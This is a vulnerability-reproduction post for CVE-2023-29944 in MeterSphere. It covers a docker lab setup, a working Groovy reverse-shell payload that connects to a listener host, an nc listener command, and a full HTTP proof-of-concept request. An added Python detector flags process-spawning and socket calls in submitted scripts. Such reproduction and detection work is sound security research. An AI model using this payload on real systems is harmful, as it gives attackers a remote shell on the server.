[Vulnerability Reproduction] CVE-2023-29944 Expression Injection

Published: 2024/12/21 12:41:34

Vulnerability Information

NVD - cve-2023-29944

Metersphere v1.20.20-lts-79d354a6 is vulnerable to Remote Command Execution. The system command reverse-shell can be executed at the custom code snippet function of the metersphere system workbench.

Background

MeterSphere is an open-source, continuous testing platform widely used by developers and QA managers for test plan management, data-driven testing, and test reporting metrics. It is engineered to integrate seamlessly with a variety of development and CI/CD toolchains to enhance productivity in DevOps environments. The platform supports functional UI, performance, and API testing, aiming to optimize testing workflows. The primary users of MeterSphere are software development teams and testing specialists seeking to attain high-quality assurance in their product cycles. Its robust plug-in architecture allows it to be extended and customized for specific workflows and tool integrations, making it adaptable across different industry requirements.

Homepage: https://metersphere.io/

Source code: https://github.com/metersphere/metersphere

Environment Setup

docker-compose.yml

version: "2.1"
services:
  web:
    image: vulhub/metersphere:1.15.4
    ports:
      - "8081:8081"
      - "5005:5005"
    environment:
      MYSQL_SERVER: db:3306
      MYSQL_DB: metersphere
      MYSQL_USERNAME: root
      MYSQL_PASSWORD: root
      KAFKA_SERVER: kafka:9092
  db:
    image: mysql:5.7
    command: --sql-mode="STRICT_TRANS_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION" --max-connections=8000
    environment:
      - MYSQL_ROOT_PASSWORD=root
      - MYSQL_DATABASE=metersphere
  kafka:
    image: bitnami/kafka:3.4.1
    environment:
      # KRaft settings
      - KAFKA_CFG_NODE_ID=0
      - KAFKA_CFG_PROCESS_ROLES=controller,broker
      - KAFKA_CFG_CONTROLLER_QUORUM_VOTERS=0@kafka:9093
      # Listeners
      - KAFKA_CFG_LISTENERS=PLAINTEXT://:9092,CONTROLLER://:9093
      - KAFKA_CFG_ADVERTISED_LISTENERS=PLAINTEXT://:9092
      - KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CONTROLLER:PLAINTEXT,PLAINTEXT:PLAINTEXT
      - KAFKA_CFG_CONTROLLER_LISTENER_NAMES=CONTROLLER
      - KAFKA_CFG_INTER_BROKER_LISTENER_NAME=PLAINTEXT

Web UI: http://127.0.0.1:8081

Account: admin, password: metersphere

Vulnerability Reproduction

Reference: https://github.com/metersphere/metersphere/security/advisories/GHSA-5473-9v2g-rpqm

After logging in through the Web UI, create a code snippet as shown below:


Payload using Groovy:

String host="172.18.0.1";int port=42239;String cmd="/bin/sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); 

On the terminal that should receive the reverse shell, start listening on port 42239:

$ nc -lvnp 42239

Enter the payload and set the snippet to be executed with Groovy:


The shell is obtained successfully:


POC:

POST /custom/func/run HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
CSRF-TOKEN: B+De+lLrLpRKpoEQ/DZ2WOaN0mpV94mVFEwtQUBbPSBTlBoh1ApgmHhxs8FTKhbyZ5WF51VDhpLCunYUswFa6w==
WORKSPACE_ID: abe94ec0-bded-11ef-a774-0242ac120004
PROJECT_ID: abe962dd-bded-11ef-a774-0242ac120004
Content-Length: 1399
Origin: http://127.0.0.1:8081
Connection: keep-alive
Referer: http://127.0.0.1:8081/
Cookie: MS_SESSION_ID=b258ff15-92fe-4f65-afa4-6cd078c64c61

{"id":"3608f369","testElement":{"id":"2b9a4424-3f58-4721-bb1e-4c5cd87a0ed1","type":"TestPlan","name":"TestPlan","enabled":true,"hashTree":[{"id":"75f5e26c-ee57-4840-8776-7fcb853d69a4","type":"ThreadGroup","name":"ThreadGroup","enabled":true,"onSampleError":true,"clazzName":"io.metersphere.api.dto.definition.request.MsThreadGroup","hashTree":[{"resourceId":"e95e5436-123f-44a7-850c-7fbd571a2d11","active":false,"type":"JSR223Processor","label":"","script":"String host=\"172.18.0.1\";int port=42239;String cmd=\"/bin/sh\";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ","scriptLanguage":"beanshell","enable":true,"hashTree":[],"id":"c0b3c59c","projectId":"abe962dd-bded-11ef-a774-0242ac120004","clazzName":"io.metersphere.api.dto.definition.request.processors.MsJSR223Processor"}]}],"clazzName":"io.metersphere.api.dto.definition.request.MsTestPlan"},"projectId":"abe962dd-bded-11ef-a774-0242ac120004","environmentMap":null,"reportId":"3608f369"}
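The POC above shows what a defender can key on: an authenticated request (session cookie and CSRF token are present) to POST /custom/func/run whose JSON body nests a JSR223Processor element under testElement.hashTree, and whose script field spawns a process and opens a raw socket. The following Python is an added example, not part of the original post or of the MeterSphere project: it walks the nested hashTree structure seen in the POC body, pulls out every JSR223Processor script, and reports scripts that contain process-spawning or socket-creating calls. The sample request bodies are constructed for the demonstration (the suspicious one mirrors the POC's structure with a shortened, non-functional script); the indicator list and the function names are assumptions, not anything MeterSphere ships.

```python
import json
import re

# Indicators taken from the script in the page's POC: process spawning and raw
# socket use inside a JSR223 script. Extend the list for your own environment.
DANGEROUS_PATTERNS = [
    (re.compile(r"\bnew\s+ProcessBuilder\s*\("), "ProcessBuilder"),
    (re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\("), "Runtime.exec"),
    (re.compile(r"\bnew\s+(?:java\.net\.)?Socket\s*\("), "Socket"),
    (re.compile(r"\bnew\s+(?:java\.net\.)?ServerSocket\s*\("), "ServerSocket"),
]

# Endpoint from the page's POC; the custom code snippet runner.
RUN_ENDPOINT = "/custom/func/run"


def iter_jsr223_scripts(node):
    """Recursively walk the test element tree (the nested 'hashTree' lists in
    the request body) and yield (scriptLanguage, script) for every
    JSR223Processor element, at any depth."""
    if isinstance(node, dict):
        if node.get("type") == "JSR223Processor":
            yield node.get("scriptLanguage", ""), node.get("script", "")
        for child in node.get("hashTree", []):
            yield from iter_jsr223_scripts(child)
    elif isinstance(node, list):
        for child in node:
            yield from iter_jsr223_scripts(child)


def inspect_request(method, path, body):
    """Inspect one HTTP request. Returns a list of findings, one per script
    that matched at least one indicator; an empty list means nothing flagged.
    Only POST requests to the snippet runner endpoint are examined."""
    findings = []
    if method.upper() != "POST" or path != RUN_ENDPOINT:
        return findings
    try:
        payload = json.loads(body)
    except json.JSONDecodeError:
        # Malformed JSON never reaches the script engine; nothing to flag here.
        return findings
    for language, script in iter_jsr223_scripts(payload.get("testElement")):
        hits = [name for pattern, name in DANGEROUS_PATTERNS if pattern.search(script)]
        if hits:
            findings.append({"language": language, "indicators": hits})
    return findings


# Constructed sample bodies (not captured traffic). The first mirrors the
# structure of the page's POC with a shortened, non-working script fragment;
# the second is a benign snippet that only touches JMeter variables.
SUSPICIOUS_BODY = json.dumps({
    "id": "sample-1",
    "testElement": {
        "type": "TestPlan",
        "hashTree": [{
            "type": "ThreadGroup",
            "hashTree": [{
                "type": "JSR223Processor",
                "scriptLanguage": "groovy",
                "script": 'Process p=new ProcessBuilder("/bin/sh").start();Socket s=new Socket(host,port);',
                "hashTree": [],
            }],
        }],
    },
})

BENIGN_BODY = json.dumps({
    "id": "sample-2",
    "testElement": {
        "type": "TestPlan",
        "hashTree": [{
            "type": "JSR223Processor",
            "scriptLanguage": "groovy",
            "script": 'vars.put("token", prev.getResponseDataAsString());',
            "hashTree": [],
        }],
    },
})


def demo():
    """Run the inspector over the constructed samples and return the results."""
    return {
        "suspicious": inspect_request("POST", RUN_ENDPOINT, SUSPICIOUS_BODY),
        "benign": inspect_request("POST", RUN_ENDPOINT, BENIGN_BODY),
        "other_path": inspect_request("POST", "/api/definition", SUSPICIOUS_BODY),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The tree walk matters more than the regex list: the POC places the script two levels deep (TestPlan, ThreadGroup, JSR223Processor), and a check that only looks at the top-level element misses it. Pattern matching on script text is a detection aid, not a fix; the underlying issue is that the endpoint executes caller-supplied scripts with the application's privileges, so the durable mitigation is upgrading to a fixed release and restricting who may reach the snippet runner.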

Original post: http://www.ppmy.cn/news/1556927.html
